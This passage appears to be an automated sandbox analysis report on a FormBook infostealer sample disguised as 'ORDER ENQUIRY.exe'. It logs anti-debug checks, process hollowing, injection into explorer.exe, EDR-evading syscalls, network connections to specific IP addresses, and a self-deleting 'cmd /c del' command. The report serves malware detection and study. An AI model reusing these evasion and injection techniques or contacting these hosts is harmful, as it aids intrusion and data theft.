Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3E9E0 mov eax, dword ptr fs:[00000030h]	3_2_01B3E9E0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE29F9 mov eax, dword ptr fs:[00000030h]	3_2_01AE29F9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE29F9 mov eax, dword ptr fs:[00000030h]	3_2_01AE29F9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7A9D3 mov eax, dword ptr fs:[00000030h]	3_2_01B7A9D3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B469C0 mov eax, dword ptr fs:[00000030h]	3_2_01B469C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA9D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA9D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA9D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA9D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA9D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]	3_2_01ABA9D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE49D0 mov eax, dword ptr fs:[00000030h]	3_2_01AE49D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3892A mov eax, dword ptr fs:[00000030h]	3_2_01B3892A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B4892B mov eax, dword ptr fs:[00000030h]	3_2_01B4892B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3C912 mov eax, dword ptr fs:[00000030h]	3_2_01B3C912
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA8918 mov eax, dword ptr fs:[00000030h]	3_2_01AA8918
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA8918 mov eax, dword ptr fs:[00000030h]	3_2_01AA8918
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E908 mov eax, dword ptr fs:[00000030h]	3_2_01B2E908
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E908 mov eax, dword ptr fs:[00000030h]	3_2_01B2E908
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF096E mov eax, dword ptr fs:[00000030h]	3_2_01AF096E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF096E mov edx, dword ptr fs:[00000030h]	3_2_01AF096E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF096E mov eax, dword ptr fs:[00000030h]	3_2_01AF096E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B54978 mov eax, dword ptr fs:[00000030h]	3_2_01B54978
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B54978 mov eax, dword ptr fs:[00000030h]	3_2_01B54978
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]	3_2_01AD6962
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]	3_2_01AD6962
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]	3_2_01AD6962
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3C97C mov eax, dword ptr fs:[00000030h]	3_2_01B3C97C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B30946 mov eax, dword ptr fs:[00000030h]	3_2_01B30946
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84940 mov eax, dword ptr fs:[00000030h]	3_2_01B84940
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0887 mov eax, dword ptr fs:[00000030h]	3_2_01AB0887
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3C89D mov eax, dword ptr fs:[00000030h]	3_2_01B3C89D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7A8E4 mov eax, dword ptr fs:[00000030h]	3_2_01B7A8E4
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEC8F9 mov eax, dword ptr fs:[00000030h]	3_2_01AEC8F9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEC8F9 mov eax, dword ptr fs:[00000030h]	3_2_01AEC8F9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE8C0 mov eax, dword ptr fs:[00000030h]	3_2_01ADE8C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B808C0 mov eax, dword ptr fs:[00000030h]	3_2_01B808C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5483A mov eax, dword ptr fs:[00000030h]	3_2_01B5483A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5483A mov eax, dword ptr fs:[00000030h]	3_2_01B5483A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]	3_2_01AD2835
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]	3_2_01AD2835
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]	3_2_01AD2835
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD2835 mov ecx, dword ptr fs:[00000030h]	3_2_01AD2835
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]	3_2_01AD2835
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]	3_2_01AD2835
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA830 mov eax, dword ptr fs:[00000030h]	3_2_01AEA830
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3C810 mov eax, dword ptr fs:[00000030h]	3_2_01B3C810
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3E872 mov eax, dword ptr fs:[00000030h]	3_2_01B3E872
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3E872 mov eax, dword ptr fs:[00000030h]	3_2_01B3E872
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B46870 mov eax, dword ptr fs:[00000030h]	3_2_01B46870
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B46870 mov eax, dword ptr fs:[00000030h]	3_2_01B46870
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC2840 mov ecx, dword ptr fs:[00000030h]	3_2_01AC2840
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB4859 mov eax, dword ptr fs:[00000030h]	3_2_01AB4859
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB4859 mov eax, dword ptr fs:[00000030h]	3_2_01AB4859
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE0854 mov eax, dword ptr fs:[00000030h]	3_2_01AE0854
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B64BB0 mov eax, dword ptr fs:[00000030h]	3_2_01B64BB0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B64BB0 mov eax, dword ptr fs:[00000030h]	3_2_01B64BB0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0BBE mov eax, dword ptr fs:[00000030h]	3_2_01AC0BBE
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0BBE mov eax, dword ptr fs:[00000030h]	3_2_01AC0BBE
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3CBF0 mov eax, dword ptr fs:[00000030h]	3_2_01B3CBF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADEBFC mov eax, dword ptr fs:[00000030h]	3_2_01ADEBFC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]	3_2_01AB8BF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]	3_2_01AB8BF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]	3_2_01AB8BF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5EBD0 mov eax, dword ptr fs:[00000030h]	3_2_01B5EBD0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]	3_2_01AB0BCD
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]	3_2_01AB0BCD
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]	3_2_01AB0BCD
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]	3_2_01AD0BCB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]	3_2_01AD0BCB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]	3_2_01AD0BCB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADEB20 mov eax, dword ptr fs:[00000030h]	3_2_01ADEB20
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADEB20 mov eax, dword ptr fs:[00000030h]	3_2_01ADEB20
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B78B28 mov eax, dword ptr fs:[00000030h]	3_2_01B78B28
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B78B28 mov eax, dword ptr fs:[00000030h]	3_2_01B78B28
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]	3_2_01B2EB1D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84B00 mov eax, dword ptr fs:[00000030h]	3_2_01B84B00
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AACB7E mov eax, dword ptr fs:[00000030h]	3_2_01AACB7E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5EB50 mov eax, dword ptr fs:[00000030h]	3_2_01B5EB50
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]	3_2_01B82B57
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]	3_2_01B82B57
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]	3_2_01B82B57
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]	3_2_01B82B57
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B46B40 mov eax, dword ptr fs:[00000030h]	3_2_01B46B40
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B46B40 mov eax, dword ptr fs:[00000030h]	3_2_01B46B40
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7AB40 mov eax, dword ptr fs:[00000030h]	3_2_01B7AB40
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B58B42 mov eax, dword ptr fs:[00000030h]	3_2_01B58B42
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA8B50 mov eax, dword ptr fs:[00000030h]	3_2_01AA8B50
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B64B4B mov eax, dword ptr fs:[00000030h]	3_2_01B64B4B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B64B4B mov eax, dword ptr fs:[00000030h]	3_2_01B64B4B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB8AA0 mov eax, dword ptr fs:[00000030h]	3_2_01AB8AA0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB8AA0 mov eax, dword ptr fs:[00000030h]	3_2_01AB8AA0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B06AA4 mov eax, dword ptr fs:[00000030h]	3_2_01B06AA4
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84A80 mov eax, dword ptr fs:[00000030h]	3_2_01B84A80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE8A90 mov edx, dword ptr fs:[00000030h]	3_2_01AE8A90
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEAAEE mov eax, dword ptr fs:[00000030h]	3_2_01AEAAEE
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEAAEE mov eax, dword ptr fs:[00000030h]	3_2_01AEAAEE
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0AD0 mov eax, dword ptr fs:[00000030h]	3_2_01AB0AD0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]	3_2_01B06ACC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]	3_2_01B06ACC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]	3_2_01B06ACC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE4AD0 mov eax, dword ptr fs:[00000030h]	3_2_01AE4AD0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE4AD0 mov eax, dword ptr fs:[00000030h]	3_2_01AE4AD0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADEA2E mov eax, dword ptr fs:[00000030h]	3_2_01ADEA2E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AECA24 mov eax, dword ptr fs:[00000030h]	3_2_01AECA24
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AECA38 mov eax, dword ptr fs:[00000030h]	3_2_01AECA38
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD4A35 mov eax, dword ptr fs:[00000030h]	3_2_01AD4A35
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD4A35 mov eax, dword ptr fs:[00000030h]	3_2_01AD4A35
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3CA11 mov eax, dword ptr fs:[00000030h]	3_2_01B3CA11
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2CA72 mov eax, dword ptr fs:[00000030h]	3_2_01B2CA72
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2CA72 mov eax, dword ptr fs:[00000030h]	3_2_01B2CA72
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AECA6F mov eax, dword ptr fs:[00000030h]	3_2_01AECA6F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AECA6F mov eax, dword ptr fs:[00000030h]	3_2_01AECA6F

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 5_2_000E1AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

5_2_000E1AC3

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.227 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.221.68.229 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	NtQueueApcThread: Indirect: 0x196A4F2			Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	NtClose: Indirect: 0x196A56C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Memory written: C:\Users\user\Desktop\ORDER ENQUIRY.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Thread register set: target process: 1028			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 1028			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000

Jump to behavior

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process created: C:\Users\user\Desktop\ORDER ENQUIRY.exe "C:\Users\user\Desktop\ORDER ENQUIRY.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe"			Jump to behavior

Source: explorer.exe, 00000004.00000002.4557463098.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100493467.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009BA5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000004.00000002.4551732250.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2100259005.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000002.4553638640.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4551732250.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2100259005.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.4551732250.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2100259005.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.4551732250.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2100259005.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000002.4550702238.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2099752489.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Queries volume information: C:\Users\user\Desktop\ORDER ENQUIRY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 5_2_000E1975 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_000E1975

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
